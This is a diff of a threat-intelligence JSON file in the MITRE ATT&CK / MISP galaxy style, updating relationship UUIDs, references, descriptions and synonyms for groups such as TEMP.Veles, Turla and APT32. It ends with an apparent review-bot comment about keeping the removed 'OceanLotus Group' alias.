"dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62166220-e498-410f-a90a-19d4339d4e99", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "795c1a92-3a26-453e-b99a-6a566aa94dc6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20a66013-8dab-4ca3-a67d-766c842c561c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "1f21da59-6a13-455b-afd0-d58d0a5a7d27", - "value": "Gorgon Group - G0078" + "uuid": "9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "value": "TEMP.Veles - G0088" }, { "description": "[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)", @@ -3301,20 +3922,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -3322,13 +3929,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ 
@@ -3336,12 +3936,40 @@ ], "type": "uses" }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "fbe9387f-34e6-4828-ac28-3080020c597b", @@ -3396,8 +4024,8 @@ "external_id": "G0013", "refs": [ "https://attack.mitre.org/groups/G0013", - "https://securelist.com/the-naikon-apt/69953/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/the-naikon-apt/69953/" ], "synonyms": [ "APT30" @@ -3439,13 +4067,6 @@ ], "type": "uses" }, - { - "dest-uuid": "43213480-78f7-4fb3-976f-d48f5f6a4c2a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b1de6916-7a22-4460-8d26-6b5483ffaa2a", "tags": [ @@ -3460,6 +4081,13 @@ ], "type": "uses" }, + { + "dest-uuid": "43213480-78f7-4fb3-976f-d48f5f6a4c2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8b880b41-5139-4807-baa9-309690218719", "tags": [ 
@@ -3509,13 +4137,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "5a84dc36-df0d-4053-9b7c-f0c388a57283", "tags": [ @@ -3523,27 +4144,6 @@ ], "type": "uses" }, - { - "dest-uuid": "2fab555f-7664-4623-b4e0-1675ae38190b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -3551,27 +4151,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ 
@@ -3579,41 +4158,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ 
@@ -3622,21 +4166,63 @@ "type": "uses" }, { - "dest-uuid": "1d808f62-cf63-4063-9727-ff6132514c22", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a52edc76-328d-4596-85e7-d56ef5a9eb69", + "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2fab555f-7664-4623-b4e0-1675ae38190b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3649,6 +4235,62 @@ ], "type": "uses" }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a52edc76-328d-4596-85e7-d56ef5a9eb69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c9cd7ec9-40b7-49db-80be-1399eddd9c52", "tags": [ 
@@ -3656,6 +4298,48 @@ ], "type": "uses" }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1d808f62-cf63-4063-9727-ff6132514c22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", "tags": [ @@ -3664,7 +4348,7 @@ "type": "uses" }, { - "dest-uuid": "4900fabf-1142-4c1f-92f5-0b590e049077", + "dest-uuid": "b45747dc-87ca-4597-a245-7e16a61bc491", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3677,20 +4361,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e51398e6-53dc-4e9f-a323-e54683d8672b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20a66013-8dab-4ca3-a67d-766c842c561c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", "tags": [ 
@@ -3699,7 +4369,21 @@
 "type": "uses"
 },
 {
- "dest-uuid": "1a295f87-af63-4d94-b130-039d6221fb11",
+ "dest-uuid": "e51398e6-53dc-4e9f-a323-e54683d8672b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "488da8ed-2887-4ef6-a39a-5b69bc6682c6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "54eb2bab-125f-4d1c-b999-0c692860bafe",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -3716,10 +4400,10 @@
 "refs": [
 "https://attack.mitre.org/groups/G0001",
 "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
- "http://blogs.cisco.com/security/talos/threat-spotlight-group-72",
 "https://securelist.com/winnti-more-than-just-a-game/37029/",
 "https://securelist.com/games-are-over/70991/",
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
+ "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
+ "http://blogs.cisco.com/security/talos/threat-spotlight-group-72"
 ],
 "synonyms": [
 "Axiom",
@@ -3762,20 +4446,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
 "tags": [
@@ -3791,7 +4461,21 @@
 "type": "uses"
 },
 {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "95047f03-4811-4300-922e-1ba937d53a61",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -3805,7 +4489,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "95047f03-4811-4300-922e-1ba937d53a61",
+ "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -3823,10 +4507,10 @@
 "https://attack.mitre.org/groups/G0010",
 "https://securelist.com/the-epic-turla-operation/65545/",
 "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
- "https://securelist.com/introducing-whitebear/81638/",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
 "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/",
- "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "https://securelist.com/introducing-whitebear/81638/"
 ],
 "synonyms": [
 "Turla",
@@ -3859,48 +4543,6 @@ ], "type": "uses" }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "80a014ba-3fef-4768-990b-37d8bd10d7f4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "76abb3ef-dafd-4762-97cb-a35379429db4", "tags": [ 
@@ -3908,55 +4550,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92b55426-109f-4d93-899f-1833ce91ff90", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ @@ -3965,7 +4558,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3979,42 +4579,28 @@ "type": "uses" }, { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b35068ec-107a-4266-bda8-eb7036267aea", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4028,42 +4614,7 @@ "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "536be338-e2ef-4a6b-afb6-8d5568b91eb2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4077,7 +4628,154 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "92b55426-109f-4d93-899f-1833ce91ff90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "80a014ba-3fef-4768-990b-37d8bd10d7f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b35068ec-107a-4266-bda8-eb7036267aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "536be338-e2ef-4a6b-afb6-8d5568b91eb2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da5880b4-f7da-4869-85f2-e0aba84b8565", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4091,7 +4789,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "dest-uuid": "b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -4102,18 +4807,20 @@
 "value": "APT32 - G0050"
 },
 {
- "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, Phillipines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. \nThe group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)",
 "meta": {
 "external_id": "G0050",
 "refs": [
 "https://attack.mitre.org/groups/G0050",
 "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
 "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/",
- "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
+ "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "https://www.cybereason.com/blog/operation-cobalt-kitty-apt"
 ],
 "synonyms": [
 "APT32",
- "OceanLotus Group",
+ "SeaLotus",
+ "OceanLotus",
 "APT-C-00"
 ]
 },
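Review bot: The synonym `"OceanLotus Group"` is removed from APT32's `synonyms` at the same time as `"SeaLotus"` and `"OceanLotus"` are added, so any consumer that has already tagged data with the old alias, or resolves group names against this list, loses its match. The synonyms in these clusters look like a matching key rather than display text, so the old alias should be kept next to the new ones: leave `"OceanLotus Group",` in place and add the two new entries after it. The same hunk also replaces the `\n` inside the description with a space, which is fine on its own, but the APT28 entry later in the patch (the -4340 hunk) still carries a paragraph break in its description, so the two entries now follow different conventions.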
